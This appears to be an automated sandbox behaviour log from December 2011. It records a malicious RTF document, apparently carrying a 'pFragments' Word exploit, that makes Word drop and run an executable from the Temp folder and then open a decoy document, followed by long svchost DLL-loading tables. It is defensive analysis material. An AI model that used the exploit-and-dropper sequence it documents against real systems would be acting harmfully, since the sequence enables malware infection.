    File write Path: C:\~$D68EF693AC6B7D3ACF0DDFF0585543.doc Offset: none Length: 54 Value: 0D 48 61 6E 75 65 6C 65 20 42 61 73 65 72 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 success or wait 433042477
    File write Path: C:\~$D68EF693AC6B7D3ACF0DDFF0585543.doc Offset: none Length: 108 Value: 0D 00 48 00 61 00 6E 00 75 00 65 00 6C 00 65 00 20 00 42 00 61 00 73 00 65 00 72 00 00 00 00 00 1E 00 00 00 0D 00 48 00 61 00 6E 00 75 00 65 00 6C 00 65 00 20 00 42 00 61 00 73 00 65 00 72 00 00 00 00 00 16 00 00 00 4E 01 0A 00 32 01 02 00 A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 98 00 00 00 success or wait 433042921
    Window created Window Name: _WwF Class Name: _WwF success 433050262
    Section loaded Path: \BaseNamedObjects\Local\MSO_Formal11106360_S-1-5-21-507921405-1960408961-839522115-500 Access: query and write and read and execute and extend size Type: unknown Baseaddress: 1A70000 Size: 524288 Protection: read write Mapped to pid: own pid object name not found 433115423
    Section loaded Path: \BaseNamedObjects\Local\MSO_Formal11106360_S-1-5-21-507921405-1960408961-839522115-500 Access: query and write and read Type: commit Baseaddress: 1A70000 Size: 8192 Protection: read write Mapped to pid: own pid success or wait 433115567
    Section loaded Path: \BaseNamedObjects\Local\MSO_AdHoc11106360_S-1-5-21-507921405-1960408961-839522115-500 Access: query and write and read and execute and extend size Type: unknown Baseaddress: 1A70000 Size: 8192 Protection: read write Mapped to pid: own pid object name not found 433117066
    Section loaded Path: \BaseNamedObjects\Local\MSO_AdHoc11106360_S-1-5-21-507921405-1960408961-839522115-500 Access: query and write and read Type: commit Baseaddress: 1A80000 Size: 8192 Protection: read write Mapped to pid: own pid success or wait 433117208
    Window created Window Name: _WwB Class Name: _WwB success 433119876
    Window created Window Name: _WwG Class Name: _WwG success 433125197
    Window created Window Name: 6.0.2600.6028!ScrollBar Class Name: SCROLLBAR success 433126329
    Window created Window Name: _WwC Class Name: _WwC success 433127650
    Window created Window Name: 6.0.2600.6028!ScrollBar Class Name: SCROLLBAR success 433219993
    Window created Window Name: _WwC Class Name: _WwC success 433303038
    Window created Window Name: _WwC Class Name: _WwC success 433303351
    Window created Window Name: _WwC Class Name: _WwC success 433309551
    Section loaded Path: C:\Program Files\Microsoft Office\OFFICE11\GDIPLUS.DLL Access: write and read and execute Type: commit Baseaddress: 2E50000 Size: 1773568 Protection: execute Mapped to pid: own pid success or wait 433359956
    Section loaded Path: C:\Program Files\Microsoft Office\OFFICE11\GDIPLUS.DLL Access: query and write and read and execute Type: image Baseaddress: 39800000 Size: 1777664 Protection: read write Mapped to pid: own pid success or wait 433361957
    Section loaded Path: \KnownDlls\WTSAPI32.DLL Access: write and read and execute Type: unknown Baseaddress: 39800000 Size: 1777664 Protection: read write Mapped to pid: own pid object name not found 433376750
    Section loaded Path: C:\WINDOWS\system32\wtsapi32.dll Access: query and write and read and execute Type: image Baseaddress: 76F50000 Size: 32768 Protection: read write Mapped to pid: own pid success or wait 433377363
    Section loaded Path: \KnownDlls\WINSTA.dll Access: write and read and execute Type: unknown Baseaddress: 76F50000 Size: 32768 Protection: read write Mapped to pid: own pid object name not found 433380590
    Section loaded Path: C:\WINDOWS\system32\winsta.dll Access: query and write and read and execute Type: image Baseaddress: 76360000 Size: 65536 Protection: read write Mapped to pid: own pid success or wait 433381197
    Section loaded Path: \KnownDlls\NETAPI32.dll Access: write and read and execute Type: unknown Baseaddress: 76360000 Size: 65536 Protection: read write Mapped to pid: own pid object name not found 433382122
    Section loaded Path: C:\WINDOWS\system32\netapi32.dll Access: query and write and read and execute Type: image Baseaddress: 5B860000 Size: 348160 Protection: read write Mapped to pid: own pid success or wait 433383632
    Memory allocated PID: 1888 Path: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE Base: 21E000 Length: 123170 Allocation Type: null Protection: page read and write success or wait 433580660
    File other operation Disposition: PositionInformation Data : Offset: 58531 Path: C:\09D68EF693AC6B7D3ACF0DDFF0585543.doc success or wait 433589584
    File read Path: C:\09D68EF693AC6B7D3ACF0DDFF0585543.doc Offset: none Length: 58531 Value: 7B 5C 72 74 66 31 7B 5C 73 68 70 7B 5C 2A 5C 73 68 70 69 6E 73 74 7B 5C 73 70 7B 5C 73 6E 20 70 46 72 61 67 6D 65 6E 74 73 7D 7B 5C 73 76 20 31 3B 31 30 30 30 30 30 30 30 30 30 30 30 30 30 30 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 success or wait 433608900
    File created Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\S Access: read attributes and synchronize and generic write Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false success or wait 434639948
    File write Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\S Offset: none Length: 17925 Value: 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E0 00 00 00 0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68 69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F 74 20 62 65 success or wait 434671674
    Section loaded Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\S Access: query and write and read and execute and extend size Type: image Baseaddress: 5B860000 Size: 348160 Protection: read write Mapped to pid: own pid success or wait 434676557
    Section loaded Path: C:\WINDOWS\system32\apphelp.dll Access: write and read and execute Type: commit Baseaddress: 2F80000 Size: 126976 Protection: execute Mapped to pid: own pid success or wait 434715648
    Section loaded Path: C:\WINDOWS\system32\apphelp.dll Access: query and write and read and execute Type: image Baseaddress: 77B40000 Size: 139264 Protection: read write Mapped to pid: own pid success or wait 434726515
    Section loaded Path: C:\WINDOWS\AppPatch\sysmain.sdb Access: read Type: commit Baseaddress: 2F80000 Size: 1208320 Protection: readonly Mapped to pid: own pid success or wait 434733189
    Section loaded Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\S Access: query and read Type: commit Baseaddress: 2F80000 Size: 20480 Protection: readonly Mapped to pid: own pid success or wait 434801697
    Process created PID: 1568 Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\S Cmdline: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\\S Createflags: 0 success or wait 434832556
    File created Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\4.doc Access: read attributes and synchronize and generic write Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false success or wait 471309054
    File write Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\4.doc Offset: none Length: 23552 Value: D0 CF 11 E0 A1 B1 1A E1 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 3E 00 03 00 FE FF 09 00 06 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 29 00 00 00 00 00 00 00 00 10 00 00 2B 00 00 00 01 00 00 00 FE FF FF FF 00 00 00 00 28 00 00 00 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF success or wait 471320989
    Section loaded Path: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE Access: query and write and read and execute and extend size Type: image Baseaddress: 2F80000 Size: 20480 Protection: readonly Mapped to pid: own pid success or wait 471323128
    Section loaded Path: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE Access: query and read Type: commit Baseaddress: 2F90000 Size: 12050432 Protection: readonly Mapped to pid: own pid success or wait 471324606
    Process created PID: 296 Path: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE Cmdline: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\4.doc Createflags: 0 success or wait 471325507
    Process terminated PID: 1888 Path: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE success or wait 495109298
    + Sections
    + General
    Start time: 04:13:05
    Start date: 13/12/2011
    Path: C:\WINDOWS\system32\svchost.exe
    Commandline: not known
    Imagebase: 0x1000000
    File size: 14336 bytes
    MD5 hash: 27C6D03BCDB8CFEB96B716F3D8BE3E18
    Section Activities:
    + Section loaded by Windows
    File Path Access Type Base Size Mapped to pid Protection Completion Count
    \KnownDlls\kernel32.dll write and read and execute unknown 7C800000 1007616 own pid read write success or wait 1
    unknown query and write and read and execute and extend size reserve 7C800000 1007616 own pid read write success or wait 1
    \NLS\NlsSectionUnicode read unknown 1B0000 90112 own pid readonly success or wait 1
    \NLS\NlsSectionLocale read unknown 1D0000 266240 own pid readonly success or wait 1
    \NLS\NlsSectionSortkey query and read unknown 220000 266240 own pid readonly success or wait 1
    \NLS\NlsSectionSortTbls read unknown 270000 24576 own pid readonly success or wait 1
    \NLS\NlsSectionSortkey00000409 read unknown 270000 24576 own pid readonly object name not found 1
    \NLS\NlsSectionSortkey00000409 read unknown 270000 24576 own pid readonly object name not found 1
    \KnownDlls\ADVAPI32.dll write and read and execute unknown 77DD0000 634880 own pid read write success or wait 1
    \KnownDlls\RPCRT4.dll write and read and execute unknown 77E70000 602112 own pid read write success or wait 1
    \KnownDlls\Secur32.dll write and read and execute unknown 77FE0000 69632 own pid read write success or wait 1
    \KnownDlls\ShimEng.dll write and read and execute unknown 77FE0000 69632 own pid read write object name not found 1
    C:\WINDOWS\system32\shimeng.dll query and write and read and execute image 5CB70000 155648 own pid read write success or wait 1
    C:\WINDOWS\AppPatch\sysmain.sdb read commit 280000 1208320 own pid readonly success or wait 1
    C:\WINDOWS\AppPatch\acgenral.dll write and read and execute commit 3C0000 1855488 own pid execute success or wait 1
    C:\WINDOWS\AppPatch\acgenral.dll write and read and execute commit 3C0000 1855488 own pid execute success or wait 1
    C:\WINDOWS\AppPatch\acgenral.dll query and write and read and execute image 6F880000 1875968 own pid read write success or wait 1
    \KnownDlls\USER32.dll write and read and execute unknown 7E410000 593920 own pid read write success or wait 1
    \KnownDlls\GDI32.dll write and read and execute unknown 77F10000 299008 own pid read write success or wait 1
    \KnownDlls\WINMM.dll write and read and execute unknown 77F10000 299008 own pid read write object name not found 1
    C:\WINDOWS\system32\winmm.dll query and write and read and execute image 76B40000 184320 own pid read write success or wait 1
    \KnownDlls\ole32.dll write and read and execute unknown 774E0000 1302528 own pid read write success or wait 1
    \KnownDlls\msvcrt.dll write and read and execute unknown 77C10000 360448 own pid read write success or wait 1
    \KnownDlls\OLEAUT32.dll write and read and execute unknown 77120000 569344 own pid read write success or wait 1
    \KnownDlls\MSACM32.dll write and read and execute unknown 77120000 569344 own pid read write object name not found 1
    C:\WINDOWS\system32\msacm32.dll query and write and read and execute image 77BE0000 86016 own pid read write success or wait 1
    \KnownDlls\VERSION.dll write and read and execute unknown 77C00000 32768 own pid read write success or wait 1
    \KnownDlls\SHELL32.dll write and read and execute unknown 7C9C0000 8482816 own pid read write success or wait 1
    \KnownDlls\SHLWAPI.dll write and read and execute unknown 77F60000 483328 own pid read write success or wait 1
    \KnownDlls\USERENV.dll write and read and execute unknown 769C0000 737280 own pid read write success or wait 1
    \KnownDlls\UxTheme.dll write and read and execute unknown 769C0000 737280 own pid read write object name not found 1
    C:\WINDOWS\system32\uxtheme.dll query and write and read and execute image 5AD70000 229376 own pid read write success or wait 1
    \NLS\NlsSectionCType read unknown 3D0000 12288 own pid readonly success or wait 1
    C:\WINDOWS\system32\imm32.dll write and read and execute commit 350000 110592 own pid execute success or wait 1
    C:\WINDOWS\system32\imm32.dll write and read and execute commit 350000 110592 own pid execute success or wait 1
    C:\WINDOWS\system32\imm32.dll query and write and read and execute image 76390000 118784 own pid read write success or wait 1
    C:\WINDOWS\system32\shell32.dll read commit 630000 8462336 own pid readonly success or wait 1
    C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll write and read and execute commit 630000 1056768 own pid execute success or wait 1
    C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll query and write and read and execute image 773D0000 1060864 own pid read write success or wait 1
    C:\WINDOWS\WindowsShell.Manifest write and read and execute commit 380000 4096 own pid execute success or wait 1
    C:\WINDOWS\WindowsShell.Manifest query and read commit 380000 4096 own pid readonly success or wait 1
    C:\WINDOWS\WindowsShell.Manifest read commit 380000 4096 own pid readonly success or wait 1
    \KnownDlls\comctl32.dll write and read and execute unknown 5D090000 630784 own pid read write success or wait 1
    C:\WINDOWS\system32\comctl32.dll read commit 630000 618496 own pid readonly success or wait 1
    C:\WINDOWS\system32\wiaservc.dll write and read and execute commit 670000 335872 own pid execute success or wait 1
    C:\WINDOWS\system32\wiaservc.dll query and write and read and execute image 75AA0000 348160 own pid read write success or wait 1
    \KnownDlls\CFGMGR32.dll write and read and execute unknown 75AA0000 348160 own pid read write object name not found 1
    C:\WINDOWS\system32\cfgmgr32.dll query and write and read and execute image 74AE0000 28672 own pid read write success or wait 1
    \KnownDlls\setupapi.DLL write and read and execute unknown 74AE0000 28672 own pid read write object name not found 1
    C:\WINDOWS\system32\setupapi.dll query and write and read and execute image 77920000 995328 own pid read write success or wait 1
    \KnownDlls\mscms.dll write and read and execute unknown 77920000 995328 own pid read write object name not found 1
    C:\WINDOWS\system32\mscms.dll query and write and read and execute image 73B30000 86016 own pid read write success or wait 1
    \KnownDlls\WINSPOOL.DRV write and read and execute unknown 73B30000 86016 own pid read write object name not found 1
    C:\WINDOWS\system32\winspool.drv query and write and read and execute image 73000000 155648 own pid read write success or wait 1
    \KnownDlls\WINSTA.dll write and read and execute unknown 73000000 155648 own pid read write object name not found 1
    C:\WINDOWS\system32\winsta.dll query and write and read and execute image 76360000 65536 own pid read write success or wait 1
    \KnownDlls\NETAPI32.dll write and read and execute unknown 76360000 65536 own pid read write object name not found 1
    C:\WINDOWS\system32\netapi32.dll query and write and read and execute image 5B860000 348160 own pid read write success or wait 1
    C:\WINDOWS\system32\rpcss.dll write and read and execute commit 680000 401408 own pid execute success or wait 1
    C:\WINDOWS\system32\winlogon.exe write and read and execute commit 680000 507904 own pid execute success or wait 1
    \KnownDlls\xpsp2res.dll write and read and execute unknown 680000 507904 own pid execute object name not found 1
    C:\WINDOWS\system32\xpsp2res.dll query and write and read and execute image 680000 2904064 own pid read write conflicting addresses 1
    \KnownDlls\CLBCATQ.DLL write and read and execute unknown 680000 2904064 own pid read write object name not found 1
    C:\WINDOWS\system32\clbcatq.dll query and write and read and execute image 76FD0000 520192 own pid read write success or wait 1
    \KnownDlls\COMRes.dll write and read and execute unknown 76FD0000 520192 own pid read write object name not found 1
    C:\WINDOWS\system32\comres.dll query and write and read and execute image 77050000 806912 own pid read write success or wait 1
    \KnownDlls\WINTRUST.dll write and read and execute unknown 77050000 806912 own pid read write object name not found 1
    C:\WINDOWS\system32\wintrust.dll query and write and read and execute image 76C30000 188416 own pid read write success or wait 1
    \KnownDlls\CRYPT32.dll write and read and execute unknown 76C30000 188416 own pid read write object name not found 1
    C:\WINDOWS\system32\crypt32.dll query and write and read and execute image 77A80000 610304 own pid read write success or wait 1
    \KnownDlls\MSASN1.dll write and read and execute unknown 77A80000 610304 own pid read write object name not found 1
    C:\WINDOWS\system32\msasn1.dll query and write and read and execute image 77B20000 73728 own pid read write success or wait 1
    \KnownDlls\IMAGEHLP.dll write and read and execute unknown 76C90000 163840 own pid read write success or wait 1
    C:\WINDOWS\system32\actxprxy.dll write and read and execute commit B20000 98304 own pid execute success or wait 1
    C:\WINDOWS\system32\actxprxy.dll query and write and read and execute image 71D40000 110592 own pid read write success or wait 1
    C:\WINDOWS\system32\sti.dll write and read and execute commit B60000 69632 own pid execute success or wait 1
    C:\WINDOWS\system32\sti.dll query and write and read and execute image 73BA0000 77824 own pid read write success or wait 1
    Section loaded by program
    File Path Access Type Base Size Mapped to pid Protection Completion Count Source Address
    + Chronological sections
    Operation Data Completion Time
    Section loaded Path: \KnownDlls\kernel32.dll Access: write and read and execute Type: unknown Baseaddress: 7C800000 Size: 1007616 Protection: read write Mapped to pid: own pid success or wait 431627791
    Section loaded Path: unknown Access: query and write and read and execute and extend size Type: reserve Baseaddress: 7C800000 Size: 1007616 Protection: read write Mapped to pid: own pid success or wait 431629165
    Section loaded Path: \NLS\NlsSectionUnicode Access: read Type: unknown Baseaddress: 1B0000 Size: 90112 Protection: readonly Mapped to pid: own pid success or wait 431630406
    Section loaded Path: \NLS\NlsSectionLocale Access: read Type: unknown Baseaddress: 1D0000 Size: 266240 Protection: readonly Mapped to pid: own pid success or wait 431630898
    Section loaded Path: \NLS\NlsSectionSortkey Access: query and read Type: unknown Baseaddress: 220000 Size: 266240 Protection: readonly Mapped to pid: own pid success or wait 431631303
    Section loaded Path: \NLS\NlsSectionSortTbls Access: read Type: unknown Baseaddress: 270000 Size: 24576 Protection: readonly Mapped to pid: own pid success or wait 431631570
    Section loaded Path: \NLS\NlsSectionSortkey00000409 Access: read Type: unknown Baseaddress: 270000 Size: 24576 Protection: readonly Mapped to pid: own pid object name not found 431632096
    Section loaded Path: \NLS\NlsSectionSortkey00000409 Access: read Type: unknown Baseaddress: 270000 Size: 24576 Protection: readonly Mapped to pid: own pid object name not found 431632226
    Section loaded Path: \KnownDlls\ADVAPI32.dll Access: write and read and execute Type: unknown Baseaddress: 77DD0000 Size: 634880 Protection: read write Mapped to pid: own pid success or wait 431632711
    Section loaded Path: \KnownDlls\RPCRT4.dll Access: write and read and execute Type: unknown Baseaddress: 77E70000 Size: 602112 Protection: read write Mapped to pid: own pid success or wait 431633869
    Section loaded Path: \KnownDlls\Secur32.dll Access: write and read and execute Type: unknown Baseaddress: 77FE0000 Size: 69632 Protection: read write Mapped to pid: own pid success or wait 431635264
    Section loaded Path: \KnownDlls\ShimEng.dll Access: write and read and execute Type: unknown Baseaddress: 77FE0000 Size: 69632 Protection: read write Mapped to pid: own pid object name not found 431638932
    Section loaded Path: C:\WINDOWS\system32\shimeng.dll Access: query and write and read and execute Type: image Baseaddress: 5CB70000 Size: 155648 Protection: read write Mapped to pid: own pid success or wait 431639572
    Section loaded Path: C:\WINDOWS\AppPatch\sysmain.sdb Access: read Type: commit Baseaddress: 280000 Size: 1208320 Protection: readonly Mapped to pid: own pid success or wait 431644909
    Section loaded Path: C:\WINDOWS\AppPatch\acgenral.dll Access: write and read and execute Type: commit Baseaddress: 3C0000 Size: 1855488 Protection: execute Mapped to pid: own pid success or wait 431649453
    Section loaded Path: C:\WINDOWS\AppPatch\acgenral.dll Access: write and read and execute Type: commit Baseaddress: 3C0000 Size: 1855488 Protection: execute Mapped to pid: own pid success or wait 431651041
    Section loaded Path: C:\WINDOWS\AppPatch\acgenral.dll Access: query and write and read and execute Type: image Baseaddress: 6F880000 Size: 1875968 Protection: read write Mapped to pid: own pid success or wait 431651788
    Section loaded Path: \KnownDlls\USER32.dll Access: write and read and execute Type: unknown Baseaddress: 7E410000 Size: 593920 Protection: read write Mapped to pid: own pid success or wait 431654538
    Section loaded Path: \KnownDlls\GDI32.dll Access: write and read and execute Type: unknown Baseaddress: 77F10000 Size: 299008 Protection: read write Mapped to pid: own pid success or wait 431655033
    Section loaded Path: \KnownDlls\WINMM.dll Access: write and read and execute Type: unknown Baseaddress: 77F10000 Size: 299008 Protection: read write Mapped to pid: own pid object name not found 431658057
    Section loaded Path: C:\WINDOWS\system32\winmm.dll Access: query and write and read and execute Type: image Baseaddress: 76B40000 Size: 184320 Protection: read write Mapped to pid: own pid success or wait 431658581
    Section loaded Path: \KnownDlls\ole32.dll Access: write and read and execute Type: unknown Baseaddress: 774E0000 Size: 1302528 Protection: read write Mapped to pid: own pid success or wait 431661236
    Section loaded Path: \KnownDlls\msvcrt.dll Access: write and read and execute Type: unknown Baseaddress: 77C10000 Size: 360448 Protection: read write Mapped to pid: own pid success or wait 431662674
    Section loaded Path: \KnownDlls\OLEAUT32.dll Access: write and read and execute Type: unknown Baseaddress: 77120000 Size: 569344 Protection: read write Mapped to pid: own pid success or wait 431665305
    Section loaded Path: \KnownDlls\MSACM32.dll Access: write and read and execute Type: unknown Baseaddress: 77120000 Size: 569344 Protection: read write Mapped to pid: own pid object name not found 431667480
    Section loaded Path: C:\WINDOWS\system32\msacm32.dll Access: query and write and read and execute Type: image Baseaddress: 77BE0000 Size: 86016 Protection: read write Mapped to pid: own pid success or wait 431667997
    Section loaded Path: \KnownDlls\VERSION.dll Access: write and read and execute Type: unknown Baseaddress: 77C00000 Size: 32768 Protection: read write Mapped to pid: own pid success or wait 431671279
    Section loaded Path: \KnownDlls\SHELL32.dll Access: write and read and execute Type: unknown Baseaddress: 7C9C0000 Size: 8482816 Protection: read write Mapped to pid: own pid success or wait 431672366
    Section loaded Path: \KnownDlls\SHLWAPI.dll Access: write and read and execute Type: unknown Baseaddress: 77F60000 Size: 483328 Protection: read write Mapped to pid: own pid success or wait 431674632
    Section loaded Path: \KnownDlls\USERENV.dll Access: write and read and execute Type: unknown Baseaddress: 769C0000 Size: 737280 Protection: read write Mapped to pid: own pid success or wait 431677941
    Section loaded Path: \KnownDlls\UxTheme.dll Access: write and read and execute Type: unknown Baseaddress: 769C0000 Size: 737280 Protection: read write Mapped to pid: own pid object name not found 431681332
    Section loaded Path: C:\WINDOWS\system32\uxtheme.dll Access: query and write and read and execute Type: image Baseaddress: 5AD70000 Size: 229376 Protection: read write Mapped to pid: own pid success or wait 431681847
    Section loaded Path: \NLS\NlsSectionCType Access: read Type: unknown Baseaddress: 3D0000 Size: 12288 Protection: readonly Mapped to pid: own pid success or wait 431686241
    Section loaded Path: C:\WINDOWS\system32\imm32.dll Access: write and read and execute Type: commit Baseaddress: 350000 Size: 110592 Protection: execute Mapped to pid: own pid success or wait 431695824
    Section loaded Path: C:\WINDOWS\system32\imm32.dll Access: write and read and execute Type: commit Baseaddress: 350000 Size: 110592 Protection: execute Mapped to pid: own pid success or wait 431696740
    Section loaded Path: C:\WINDOWS\system32\imm32.dll Access: query and write and read and execute Type: image Baseaddress: 76390000 Size: 118784 Protection: read write Mapped to pid: own pid success or wait 431697489
    Section loaded Path: C:\WINDOWS\system32\shell32.dll Access: read Type: commit Baseaddress: 630000 Size: 8462336 Protection: readonly Mapped to pid: own pid success or wait 431744712
    Section loaded Path: C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll Access: write and read and execute Type: commit Baseaddress: 630000 Size: 1056768 Protection: execute Mapped to pid: own pid success or wait 431759577
    Section loaded Path: C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll Access: query and write and read and execute Type: image Baseaddress: 773D0000 Size: 1060864 Protection: read write Mapped to pid: own pid success or wait 431760517
    Section loaded Path: C:\WINDOWS\WindowsShell.Manifest Access: write and read and execute Type: commit Baseaddress: 380000 Size: 4096 Protection: execute Mapped to pid: own pid success or wait 431763970
    Section loaded Path: C:\WINDOWS\WindowsShell.Manifest Access: query and read Type: commit Baseaddress: 380000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 431765018
    Section loaded Path: C:\WINDOWS\WindowsShell.Manifest Access: read Type: commit Baseaddress: 380000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 431765831
    Section loaded Path: \KnownDlls\comctl32.dll Access: write and read and execute Type: unknown Baseaddress: 5D090000 Size: 630784 Protection: read write Mapped to pid: own pid success or wait 431778782
    Section loaded Path: C:\WINDOWS\system32\comctl32.dll Access: read Type: commit Baseaddress: 630000 Size: 618496 Protection: readonly Mapped to pid: own pid success or wait 431782405
    Section loaded Path: C:\WINDOWS\system32\wiaservc.dll Access: write and read and execute Type: commit Baseaddress: 670000 Size: 335872 Protection: execute Mapped to pid: own pid success or wait 431821262
    Section loaded Path: C:\WINDOWS\system32\wiaservc.dll Access: query and write and read and execute Type: image Baseaddress: 75AA0000 Size: 348160 Protection: read write Mapped to pid: own pid success or wait 431823515
    Section loaded Path: \KnownDlls\CFGMGR32.dll Access: write and read and execute Type: unknown Baseaddress: 75AA0000 Size: 348160 Protection: read write Mapped to pid: own pid object name not found 431827577
    Section loaded Path: C:\WINDOWS\system32\cfgmgr32.dll Access: query and write and read and execute Type: image Baseaddress: 74AE0000 Size: 28672 Protection: read write Mapped to pid: own pid success or wait 431828207
    Section loaded Path: \KnownDlls\setupapi.DLL Access: write and read and execute Type: unknown Baseaddress: 74AE0000 Size: 28672 Protection: read write Mapped to pid: own pid object name not found 431830173
    Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 431830690
    Section loaded Path: \KnownDlls\mscms.dll Access: write and read and execute Type: unknown Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid object name not found 431833650
    Section loaded Path: C:\WINDOWS\system32\mscms.dll Access: query and write and read and execute Type: image Baseaddress: 73B30000 Size: 86016 Protection: read write Mapped to pid: own pid success or wait 431834956
    Section loaded Path: \KnownDlls\WINSPOOL.DRV Access: write and read and execute Type: unknown Baseaddress: 73B30000 Size: 86016 Protection: read write Mapped to pid: own pid object name not found 431839469
    Section loaded Path: C:\WINDOWS\system32\winspool.drv Access: query and write and read and execute Type: image Baseaddress: 73000000 Size: 155648 Protection: read write Mapped to pid: own pid success or wait 431840020
    Section loaded Path: \KnownDlls\WINSTA.dll Access: write and read and execute Type: unknown Baseaddress: 73000000 Size: 155648 Protection: read write Mapped to pid: own pid object name not found 431844296
    Section loaded Path: C:\WINDOWS\system32\winsta.dll Access: query and write and read and execute Type: image Baseaddress: 76360000 Size: 65536 Protection: read write Mapped to pid: own pid success or wait 431844823
    Section loaded Path: \KnownDlls\NETAPI32.dll Access: write and read and execute Type: unknown Baseaddress: 76360000 Size: 65536 Protection: read write Mapped to pid: own pid object name not found 431847425
    Section loaded Path: C:\WINDOWS\system32\netapi32.dll Access: query and write and read and execute Type: image Baseaddress: 5B860000 Size: 348160 Protection: read write Mapped to pid: own pid success or wait 431847967
    Section loaded Path: C:\WINDOWS\system32\rpcss.dll Access: write and read and execute Type: commit Baseaddress: 680000 Size: 401408 Protection: execute Mapped to pid: own pid success or wait 431870787
    Section loaded Path: C:\WINDOWS\system32\winlogon.exe Access: write and read and execute Type: commit Baseaddress: 680000 Size: 507904 Protection: execute Mapped to pid: own pid success or wait 431876974
    Section loaded Path: \KnownDlls\xpsp2res.dll Access: write and read and execute Type: unknown Baseaddress: 680000 Size: 507904 Protection: execute Mapped to pid: own pid object name not found 431878913
    Section loaded Path: C:\WINDOWS\system32\xpsp2res.dll Access: query and write and read and execute Type: image Baseaddress: 680000 Size: 2904064 Protection: read write Mapped to pid: own pid conflicting addresses 431879428
    Section loaded Path: \KnownDlls\CLBCATQ.DLL Access: write and read and execute Type: unknown Baseaddress: 680000 Size: 2904064 Protection: read write Mapped to pid: own pid object name not found 431886024
    Section loaded Path: C:\WINDOWS\system32\clbcatq.dll Access: query and write and read and execute Type: image Baseaddress: 76FD0000 Size: 520192 Protection: read write Mapped to pid: own pid success or wait 431886574
    Section loaded Path: \KnownDlls\COMRes.dll Access: write and read and execute Type: unknown Baseaddress: 76FD0000 Size: 520192 Protection: read write Mapped to pid: own pid object name not found 431887565
    Section loaded Path: C:\WINDOWS\system32\comres.dll Access: query and write and read and execute Type: image Baseaddress: 77050000 Size: 806912 Protection: read write Mapped to pid: own pid success or wait 431888142
    Section loaded Path: \KnownDlls\WINTRUST.dll Access: write and read and execute Type: unknown Baseaddress: 77050000 Size: 806912 Protection: read write Mapped to pid: own pid object name not found 432193949
    Section loaded Path: C:\WINDOWS\system32\wintrust.dll Access: query and write and read and execute Type: image Baseaddress: 76C30000 Size: 188416 Protection: read write Mapped to pid: own pid success or wait 432194516
    Section loaded Path: \KnownDlls\CRYPT32.dll Access: write and read and execute Type: unknown Baseaddress: 76C30000 Size: 188416 Protection: read write Mapped to pid: own pid object name not found 432196906
    Section loaded Path: C:\WINDOWS\system32\crypt32.dll Access: query and write and read and execute Type: image Baseaddress: 77A80000 Size: 610304 Protection: read write Mapped to pid: own pid success or wait 432197473
    Section loaded Path: \KnownDlls\MSASN1.dll Access: write and read and execute Type: unknown Baseaddress: 77A80000 Size: 610304 Protection: read write Mapped to pid: own pid object name not found 432200348
    Section loaded Path: C:\WINDOWS\system32\msasn1.dll Access: query and write and read and execute Type: image Baseaddress: 77B20000 Size: 73728 Protection: read write Mapped to pid: own pid success or wait 432200982
    Section loaded Path: \KnownDlls\IMAGEHLP.dll Access: write and read and execute Type: unknown Baseaddress: 76C90000 Size: 163840 Protection: read write Mapped to pid: own pid success or wait 432206108
    Section loaded Path: C:\WINDOWS\system32\actxprxy.dll Access: write and read and execute Type: commit Baseaddress: B20000 Size: 98304 Protection: execute Mapped to pid: own pid success or wait 432447279
    Section loaded Path: C:\WINDOWS\system32\actxprxy.dll Access: query and write and read and execute Type: image Baseaddress: 71D40000 Size: 110592 Protection: read write Mapped to pid: own pid success or wait 432448376
    Section loaded Path: C:\WINDOWS\system32\sti.dll Access: write and read and execute Type: commit Baseaddress: B60000 Size: 69632 Protection: execute Mapped to pid: own pid success or wait 432482927
    Section loaded Path: C:\WINDOWS\system32\sti.dll Access: query and write and read and execute Type: image Baseaddress: 73BA0000 Size: 77824 Protection: read write Mapped to pid: own pid success or wait 432486174
    + Sections
    + General
    Start time: 04:13:06
